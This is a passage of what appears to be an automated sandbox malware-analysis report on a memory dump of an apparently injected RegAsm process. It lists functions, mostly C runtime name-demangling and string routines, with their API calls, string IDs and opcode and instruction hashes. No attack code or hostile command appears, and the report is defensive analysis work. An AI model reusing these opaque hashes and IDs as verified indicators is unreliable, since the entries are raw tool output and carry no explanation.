                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44d04b42bd7f64a9fbdc2a737b1503d7bc291e2cb923117d01b19c19c51f0a78
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D415BB5D0020ADBCF04DFA8D989BEEBFF8BB46308F104519E505A7241D7719A88DB92
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name::operator+$NameName::$Decorator::getReturnTypeoperator+
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2932655852-0
                                                                                                                                                                                                                                          • Opcode ID: 051f2e2ec0fc0c73c736bc1839f58056cbca688b00fb25940a8b68e4ded01730
                                                                                                                                                                                                                                          • Instruction ID: 000a7de5a9f062fbf30602ca6b2b18ce2aaaf6586bb93537d5f4f5eeda67c721
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 051f2e2ec0fc0c73c736bc1839f58056cbca688b00fb25940a8b68e4ded01730
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1EC172B1904209AFCF14DFA8D896AFE7FB8FB5D308F100569F506A7291EB309A45DB50
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Replicator::operator[].LIBCMT ref: 0054A135
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Replicator::operator[]
                                                                                                                                                                                                                                          • String ID: @$`generic-type-$`template-parameter-$generic-type-$template-parameter-
                                                                                                                                                                                                                                          • API String ID: 3676697650-3433397351
                                                                                                                                                                                                                                          • Opcode ID: 660f987c135bd54bbdf5e96d1fe35c0d55838b59f44e33779990b02873a96446
                                                                                                                                                                                                                                          • Instruction ID: 65a89cd21b710b857e180ea9b56b32140d1b1376361f3798b4feb2f2ae664960
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 660f987c135bd54bbdf5e96d1fe35c0d55838b59f44e33779990b02873a96446
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F261C075D442099FDB00DFA4D849BEEBFB8BF59308F104429EA01B7291DB749909DB91
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: operator+shared_ptr$NameName::
                                                                                                                                                                                                                                          • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                                          • API String ID: 2894330373-757766384
                                                                                                                                                                                                                                          • Opcode ID: 62c78a45a311e9d8c39e42b8bd332dbeb8d5bd46d5e0723c7f87cedc83f0bd37
                                                                                                                                                                                                                                          • Instruction ID: 73f3193a950c44e03eb166a4d69024b4788f275710193067aed13150d85364f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62c78a45a311e9d8c39e42b8bd332dbeb8d5bd46d5e0723c7f87cedc83f0bd37
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C619A7480410AEECB14DF68CC489FE7FB4FB4970CF048A6AE855AB211DB759645DF90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: operator+$Name::operator+
                                                                                                                                                                                                                                          • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                                                                                                                                                                                                          • API String ID: 1198235884-2239912363
                                                                                                                                                                                                                                          • Opcode ID: f8e0ba3558774e3a242d122333246f3809362ad6e8eb574fc22014946d50ec2d
                                                                                                                                                                                                                                          • Instruction ID: 7c7e5bff818a941dcfe79e601a5e8e31d70bfacc444b7772a10236a8f879a01f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8e0ba3558774e3a242d122333246f3809362ad6e8eb574fc22014946d50ec2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD4111B0904209AFDF10DF94D849BFE7FF5BB05318F048859EA15AB251DBB49A48DF80
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 005458B4
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00545907
                                                                                                                                                                                                                                            • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                            • Part of subcall function 00544405: DName::operator+.LIBCMT ref: 00544426
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 005458F8
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00545958
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00545965
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 005459AC
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 005459B9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name::operator+$shared_ptr
                                                                                                                                                                                                                                          • String ID: HV
                                                                                                                                                                                                                                          • API String ID: 1037112749-1037838562
                                                                                                                                                                                                                                          • Opcode ID: 1c3b66cf4e4e30fde5248420b985507d24960887c4dae321197c1bbce77a81d2
                                                                                                                                                                                                                                          • Instruction ID: 108bcb62c00516556a76b7d2b0d91d07d1d1761b4f47007b49a6be26a047f238
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c3b66cf4e4e30fde5248420b985507d24960887c4dae321197c1bbce77a81d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 945190B1900619EBDF05DBA4C849FEEBFB8FB48714F144419F602A7181EB349A44CBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0056646F), ref: 00566B1C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                          • Opcode ID: e4f2f05fd6a0abc3649a66b90c2f681f835bab45a522b097eb801e84404631cd
                                                                                                                                                                                                                                          • Instruction ID: 58fc13782c1a2441b6850707650057e27253402340535adaf62e712985e30948
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4f2f05fd6a0abc3649a66b90c2f681f835bab45a522b097eb801e84404631cd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25517774900E0ADBEB109F68E8881ADBFB4FB49304F104595E4C2A7264CB748E69EB59
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameName::Name::operator+shared_ptr
                                                                                                                                                                                                                                          • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                                          • API String ID: 3919194733-3894466517
                                                                                                                                                                                                                                          • Opcode ID: 63fe147f499c64e451dcb104e9b6a140272a3779615e1466f6713bb81907b1c5
                                                                                                                                                                                                                                          • Instruction ID: 5dfba9cc13da80164562219bfc48040da0b8cee7c4c7da799e20225a4d46394f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 63fe147f499c64e451dcb104e9b6a140272a3779615e1466f6713bb81907b1c5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7212AB4D00249EFCB04CFA8D8997EEBFB4FB06309F008959E461A7295D7B59A48CF51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,0041F86B,00000000,00000000,8341C89B,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 00540FE9
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0041F869,?,00000000,00000000,?,Function_001415D0,00589468,000000FE,?,0041F869), ref: 00541064
                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0054106F
                                                                                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 00541098
                                                                                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 005410A2
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(80070057,8341C89B,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 005410A7
                                                                                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 005410BA
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,?,Function_001415D0,00589468,000000FE,?,0041F869,00000001), ref: 005410D0
                                                                                                                                                                                                                                          • _com_issue_error.COMSUPP ref: 005410E3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1353541977-0
                                                                                                                                                                                                                                          • Opcode ID: 2fe2c51653d8cda91546c187e4437ef71e7e62000d21293260729d718a266f4c
                                                                                                                                                                                                                                          • Instruction ID: 3273c3d7c6ba730919ae7ead805ef241dc3f2e5e58777b6658a3f02201a3b698
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fe2c51653d8cda91546c187e4437ef71e7e62000d21293260729d718a266f4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B414971A00645ABDB10DF68DC49BEEBFA8FB44758F204239F909E7281D7759884CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __FindPESection.LIBCMT ref: 00568301
                                                                                                                                                                                                                                          • VirtualQuery.KERNEL32(83000000,8341C89B,0000001C,8341C89B,?,?,?), ref: 005683E6
                                                                                                                                                                                                                                          • __FindPESection.LIBCMT ref: 00568423
                                                                                                                                                                                                                                          • __FindPESection.LIBCMT ref: 0056845D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FindSection$QueryVirtual
                                                                                                                                                                                                                                          • String ID: < Y$< Y$< Y
                                                                                                                                                                                                                                          • API String ID: 2992484814-2098822819
                                                                                                                                                                                                                                          • Opcode ID: 3b793e36efddfdf0282e14faa0d2fbde381f196fff8897a5aeeb879d4427cb30
                                                                                                                                                                                                                                          • Instruction ID: 0c786a70bc05507d8cf3a2c5bdfa6f6d59f7082cdbc7ea77bdd947899ef05769
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b793e36efddfdf0282e14faa0d2fbde381f196fff8897a5aeeb879d4427cb30
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 43A1B075A00A1A9FCB20CF58D9847BDBBB8FB58720F15076AE819A7391DB31DC45CB90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00549FE8
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00549FF4
                                                                                                                                                                                                                                            • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                          • DName::operator+=.LIBCMT ref: 0054A0B2
                                                                                                                                                                                                                                            • Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 005488C9
                                                                                                                                                                                                                                            • Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 00548B93
                                                                                                                                                                                                                                            • Part of subcall function 00544405: DName::operator+.LIBCMT ref: 00544426
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 0054A06F
                                                                                                                                                                                                                                            • Part of subcall function 00544532: DName::operator=.LIBVCRUNTIME ref: 00544553
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 0054A0D6
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 0054A0E2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
                                                                                                                                                                                                                                          • String ID: {for
                                                                                                                                                                                                                                          • API String ID: 2795783184-864106941
                                                                                                                                                                                                                                          • Opcode ID: bdbd1897dbe82126fc8655caad7fd300d3708f8b04b2bdd4b2af56ab052036d1
                                                                                                                                                                                                                                          • Instruction ID: 3819757beef3ac60148b6cdd210775a5acd7a301e286b7ddf90b1f29eef026ee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdbd1897dbe82126fc8655caad7fd300d3708f8b04b2bdd4b2af56ab052036d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A041E4B0A80244AFDF14DFA8C859BEE7FF9BB4A304F404458E289EB281DB749D45CB51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 005454FF: Replicator::operator[].LIBCMT ref: 0054556B
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 00545658
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 0054569E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: NameName::Name::operator+Replicator::operator[]
                                                                                                                                                                                                                                          • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                          • API String ID: 583996491-2211150622
                                                                                                                                                                                                                                          • Opcode ID: 387559c01c155620a9fd0e4bcd2e95fb6cbb8e81fc031162b26aa8a3a8eb7de6
                                                                                                                                                                                                                                          • Instruction ID: 22717dab220000f2b2fe5b9231030ba8d422ba255fa49f262cc73ca56132a8c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 387559c01c155620a9fd0e4bcd2e95fb6cbb8e81fc031162b26aa8a3a8eb7de6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E313A70900609DFCB04DF98C8546EEBFF4FB09308F508559D656EB252E7749A08DF41
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00419F62
                                                                                                                                                                                                                                          • int.LIBCPMTD ref: 00419F74
                                                                                                                                                                                                                                            • Part of subcall function 0040E500: std::_Lockit::_Lockit.LIBCPMT ref: 0040E516
                                                                                                                                                                                                                                            • Part of subcall function 0040E500: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E540
                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMTD ref: 00419FBB
                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 0041A031
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                                                                                                                                                                          • String ID: zA$zA
                                                                                                                                                                                                                                          • API String ID: 3053331623-2891261629
                                                                                                                                                                                                                                          • Opcode ID: 64b8a471f0bbf50294b7c22394a367852c954cdf6a9aa49a91d3b8e7e4af76d4
                                                                                                                                                                                                                                          • Instruction ID: 53972e3499c9381113a31361ce457d97195298eb20028607f6c6d65a004869b6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 64b8a471f0bbf50294b7c22394a367852c954cdf6a9aa49a91d3b8e7e4af76d4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F31B2B4D00209EFCB04DF95D581AEEBBB1BF48304F10856AE815A7390EB34AE45CFA5
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: !kcc$7$>
                                                                                                                                                                                                                                          • API String ID: 0-3074482854
                                                                                                                                                                                                                                          • Opcode ID: 29750111deb84b7588785617db08492fa461d3798ce80ec83168ceaa2c92d49a
                                                                                                                                                                                                                                          • Instruction ID: 1a053a08fb235a40f07a1a16a9561ee80e966d54d3274d9a8826d429f96d62fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29750111deb84b7588785617db08492fa461d3798ce80ec83168ceaa2c92d49a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75F14274D04248DFDB14CFA8C890BEEBBB2BF49304F1484A9D845AB386D735AA45CF60
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: f70da735b144380618cf4515d7c89395848c01acb3a287e63f8147dc8b992a0b
                                                                                                                                                                                                                                          • Instruction ID: a4d94c605d1a9f00be99a8e263be0421509704955c1c499ae9695e573385f7e4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f70da735b144380618cf4515d7c89395848c01acb3a287e63f8147dc8b992a0b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40B15772A003569FDF118E68CCA1BBE7FA5FF59312F158556EC04AF382E274A905C7A0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _memcpy_s
                                                                                                                                                                                                                                          • String ID: Info$Salt
                                                                                                                                                                                                                                          • API String ID: 2001391462-2052181562
                                                                                                                                                                                                                                          • Opcode ID: 218cf15dcfcf4135066c03b29503c0864adc5bbb05f67a6515e3a2314924ca5a
                                                                                                                                                                                                                                          • Instruction ID: c264f8babf55e3121e48eae263ef24839df939fa8e29ab3a41309e630623033c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 218cf15dcfcf4135066c03b29503c0864adc5bbb05f67a6515e3a2314924ca5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1991C8B5E002089BCF18DF95D891AEEBBB5BF48700F20815EE519B7391DB34A941CF64
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00541607
                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 0054160F
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00541698
                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 005416C3
                                                                                                                                                                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00541718
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                          • String ID: csm
                                                                                                                                                                                                                                          • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                          • Opcode ID: a540b074671f36167dc129147950784cfae59cc2a7a1fa721ab5878aeb002676
                                                                                                                                                                                                                                          • Instruction ID: c68a64b44508398c878f129a5d3fe6c98b1eedbf56001cbea5a083c7032634fd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a540b074671f36167dc129147950784cfae59cc2a7a1fa721ab5878aeb002676
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A241E134A002099BCF10DF68C884AEEBFB5FF85328F188555E815AB352D731EA41CF96
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,0041C3C8,?,8341C89B,?,0055B854,0041C3C8,0053EE88,00000000,0041C3C8), ref: 0055B806
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                          • Opcode ID: 07332b6ce17e2f703ef61ed6b4f156b0a394a141b95f34ed5d9ccba1d0ca9100
                                                                                                                                                                                                                                          • Instruction ID: e3e96c8ff579e253a43238db1645e7e45017178ed6114f0d3f05bd009eec5719
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07332b6ce17e2f703ef61ed6b4f156b0a394a141b95f34ed5d9ccba1d0ca9100
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50212B35A11111EFEB219B34DC99A5A3F68FF967A1F210612ED05A72C0D770ED09D6E0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00540C2E
                                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00540C99
                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00540CB6
                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00540CF5
                                                                                                                                                                                                                                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00540D54
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00540D77
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2829165498-0
                                                                                                                                                                                                                                          • Opcode ID: 965879474f20308d66b19da333d38cfe82853274df6174ffd504edcd705e059b
                                                                                                                                                                                                                                          • Instruction ID: 7924bcfe56baad60bca6f69dd414dbd1d4c79609b7320330f16e382d54830c9a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 965879474f20308d66b19da333d38cfe82853274df6174ffd504edcd705e059b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9351DF7290020AABEF205FA4CC45FEB7FA9FF44758F204529FA15A7194D774AC18CBA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0054A0F8: Replicator::operator[].LIBCMT ref: 0054A135
                                                                                                                                                                                                                                          • DName::operator=.LIBVCRUNTIME ref: 00548CC8
                                                                                                                                                                                                                                            • Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 005488C9
                                                                                                                                                                                                                                            • Part of subcall function 0054885E: DName::operator+.LIBCMT ref: 00548B93
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548C82
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548C8E
                                                                                                                                                                                                                                          • DName::DName.LIBVCRUNTIME ref: 00548CD2
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548CEF
                                                                                                                                                                                                                                          • DName::operator+.LIBCMT ref: 00548CFB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 955152517-0
                                                                                                                                                                                                                                          • Opcode ID: 6057e8de4a3bc3946397680d610b676326f041e0c2e18d8cea43842d062cffb7
                                                                                                                                                                                                                                          • Instruction ID: ea259bc8041b85ddfc26555461702d1f19262a6af636b3ae9ec508b4714b1276
